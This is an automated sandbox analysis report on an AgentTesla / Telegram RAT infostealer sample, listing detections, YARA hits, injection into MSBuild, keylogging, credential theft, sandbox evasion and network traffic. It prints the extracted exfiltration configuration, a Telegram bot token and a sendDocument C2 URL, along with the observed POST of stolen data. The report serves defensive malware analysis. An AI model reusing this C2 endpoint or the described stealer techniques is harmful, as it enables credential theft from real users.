Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438 (renamed file extension from 5438 to exe)
Analysis ID:620228
MD5:5d5f37a7cf3a9ff4277b3a9dc2c4b9d2
SHA1:1a115c8a1761ef2a2cf61d854d1d2c201c902d53
SHA256:31941c96fa470de35d08fd8bdc215c2ff2cbeb82dd72e91aafa563c08af7c969
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ykVBUY.exe (PID: 5256 cmdline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe" MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ykVBUY.exe (PID: 2976 cmdline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe" MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 3264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1131810225", "Chat URL": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              9.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                9.2.MSBuild.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32e84:$s10: logins
                • 0x328eb:$s11: credential
                • 0x2ed14:$g1: get_Clipboard
                • 0x2ed22:$g2: get_Keyboard
                • 0x2ed2f:$g3: get_Password
                • 0x300eb:$g4: get_CtrlKeyDown
                • 0x300fb:$g5: get_ShiftKeyDown
                • 0x3010c:$g6: get_AltKeyDown
                9.0.MSBuild.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  9.0.MSBuild.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 25 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 9.0.MSBuild.exe.400000.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1131810225", "Chat URL": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument"}
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.6260.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendMessage"}
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeReversingLabs: Detection: 26%
                    Machine Learning detection for sample
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeJoe Sandbox ML: detected
                    Source: 9.0.MSBuild.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.MSBuild.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.MSBuild.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.MSBuild.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560cHost: api.telegram.orgContent-Length: 754Expect: 100-continueConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 67.26.81.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 67.26.81.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.248.245.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.203.110
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://UhwhaG.com
                    Source: MSBuild.exe, 00000009.00000002.529774217.00000000031DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/
                    Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentdocument-----
                    Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownHTTP traffic detected: POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560cHost: api.telegram.orgContent-Length: 754Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0687B0F8 SetWindowsHookExW 0000000D,00000000,?,?
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.316437923.000000000162B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASS

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Modifies the hosts file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: 9.0.MSBuild.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.2.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_0325C344
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_0325E760
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_0325E770
